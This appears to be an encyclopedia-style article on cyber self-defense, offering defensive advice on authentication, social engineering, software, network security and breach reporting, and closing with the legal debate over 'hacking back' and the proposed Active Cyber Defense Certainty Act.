Cyber self-defense

In cybersecurity, cyber self-defense refers to self-defense against cyberattack. While it generally emphasizes active cybersecurity measures by computer users themselves, cyber self-defense is sometimes used to refer to the self-defense of organizations as a whole, such as corporate entities or entire nations. Surveillance self-defense  is a variant of cyber self-defense and largely overlaps with it. Active and passive cybersecurity measures provide defenders with higher levels of cybersecurity, intrusion detection, incident handling and remediation capabilities. Various sectors and organizations are legally obligated to adhere to cyber security standards.

Background
Organizations may conduct a penetration test via internal team or hire a third-party organization to audit the organization's systems. Larger organizations may conduct internal attacker-defender scenarios with a "red team" attacking and a "blue team" defending. The defenders, namely threat hunters, system administrators, and programmers, proactively manage information systems, remediate vulnerabilities, gather cyber threat intelligence, and harden their operating systems, code, connected devices, and networks. Blue teams may include all information and physical security personnel employed by the organization. Physical security may be tested for weaknesses, and all employees may be the target of social engineering attacks and IT security audits. Digital and physical systems may be audited with varying degrees of knowledge of relevant systems to simulate realistic conditions for attackers and for employees, who are frequently trained in security practices and measures. In full-knowledge test scenarios, known as white box tests, the attacking party knows all available information regarding the client's systems. In black box tests, the attacking party is provided with no information regarding the client's systems. Gray box tests provide limited information to the attacking party.

Cybersecurity researcher Jeffrey Carr compares cyber self-defense to martial arts as one's computer and network attack surface may be shrunk to reduce the risk of exploitation.

Authentication

 * Enable multi-factor authentication.
 * Minimize authentication risk by limiting the number of people who know one's three common authentication factors, such as "something you are, something you know, or something you have." Unique information is characterized as possessing a particular degree of usefulness to a threat actor in gaining unauthorized access to a person's information.
 * Reduce one's social media footprint to mitigate risk profile.
 * Regularly check one's social media security and privacy settings.
 * Create strong and unique passwords for each user account and change passwords frequently and after any security incident.
 * Use a password manager to avoid storing passwords in physical form. This incurs a greater software risk profile due to potential vulnerabilities in the password management software, but mitigates the risk of breaches if one's password list were stolen or lost and in the case keyloggers were present on machine.
 * Pay attention to what information one might accidentally reveal in online posts.
 * Change default passwords to programs and services to prevent default credential vulnerability exploitation techniques.
 * Appropriately use password brute force attack prevention software such as Fail2ban or an effective equivalent.
 * Never give out logins or passwords to anyone unless absolutely necessary and if so, change them immediately thereafter.
 * Use security questions and answers that are impossible for anybody else to answer even if they have access to one's social media posts or engage in social engineering.

Anti-social engineering measures

 * Do not plug in found external storage devices, such as external hard drives, USB flash drives, and other digital media.
 * Beware of social engineering techniques and the six key principles, reciprocity, commitment and consistency, social proof, authority, liking, and scarcity.
 * Beware of shoulder surfing, wherein threat actors collect passwords and authentication information by physically observing the target user.
 * Beware of piggybacking (tailgating) wherein a threat actor closely follows an authorized personnel into a secure facility.
 * Beware of wardriving, wherein threat actors use mobile hacking stations to gain unauthorized access to WiFi. Wardriving might also consist of the use of parabolic microphones to gather acoustic data, such as passwords and personally identifiable data.
 * Be cautious when browsing and opening email attachments or links in emails, known as phishing.
 * Refrain from interacting with fake phone calls voice fishing, also known as "vishing".
 * Scan links to malicious websites with Google Transparency Report to check for known malware.

Preventative software measures

 * Use, but do not rely solely on antivirus software, as evading it is trivial for threat actors. This is due to its reliance on an easily altered digital signature, a form of applied hash, of the previously known malicious code.
 * Use an antimalware product, such as Malwarebytes Anti-Malware, in conjunction with an antivirus with vulnerability scanning features.
 * Update and upgrade all of one's software and programs — including, but not limited to a user's operating system, firmware, software drivers, and device drivers. Use dedicated updating-software and enable automated update features.
 * Encrypt one's computer and phone.
 * Regularly create backups of one's data.
 * Uninstall insecure software such as Adobe Flash on one's operating system. Refrain from accessing web pages and related plugins within one's web browser.
 * Only run software when necessary to reduce attack surface.
 * Refrain from rooting one's phone or internet-facing device.

Network and information security measures

 * Using a firewall on Internet-connected devices.
 * Not running programs, services, or browsers with a super-user or privileged user account, such as root in Linux and Unix ) or as Administrator (Windows), unless one understands the security risks of such an action.
 * Avoiding free WiFi and not logging into any accounts while using it.
 * Appropriately using privacy and anonymity software such as Tor (anonymity network) for anonymous web browsing, given that this attracts some attention.
 * Appropriately using HTTP and various Internet Protocol proxies and security measures, such as disabling HTTP header fields, filtering, and relaying traffic with proxy servers such as Squid Proxy, proxychains, socks4, and socks5.
 * Publishing public keys for PGP authentication for being able to prove one's identity.
 * Using the strongest encryption method one's router offers and updating router firmware.
 * Using an intrusion detection system(IDS) or a SIEM (Security Information and Event Management System) to alert as to indicators of compromise, such as configuration changes in the operating system, privilege escalation, network security breaches, and unauthorized remote logins.
 * Using a demilitarized zone to reduce the number of systems and services openly facing the internet.
 * Using a virtual private network with IPsec to secure traffic at the transport layer of the OSI model to harden the IP stack.

Reporting breaches and incidents

 * Gather evidence and document security and data breaches (intrusions).
 * Contact relevant authorities, administrators or organizations in the case of a cyberattack.
 * Beware of website data breaches wherein stored passwords and personally identifiable information are publicized.
 * Refer to a state's statute on security breach notification laws.

"Hacking back"
Legal theorists and policy makers are increasingly considering authorizing the private sector to take active measures by "hacking back" (also known as hackbacks). In contrast to active attack measures, passive defense measures present a reduced risk of cyberwarfare, legal, political, and economic fallout.

A contemporary topic in debate and research is the question of 'when does a cyber-attack, or the threat thereof, give rise to a right of self-defense?'

In March 2017, Tom Graves proposed the Active Cyber Defense Certainty Act (ACDC) that would enhance the Computer Fraud and Abuse Act (CFAA) to allow individuals and the private sector to use certain tools currently restricted under the CFAA to identify attackers and prevent attacks by hacking them. This presents a "chicken or the egg" problem, wherein if everyone were allowed to hack anyone, then everyone would hack everyone and only the most skilled and resourced would remain. Brad Maryman warns of unintended consequences, stating that in his view "the notion that we should legislate and accept a level of undocumented and unmonitored cyber actions by anyone who thinks they have been hacked is unfathomable".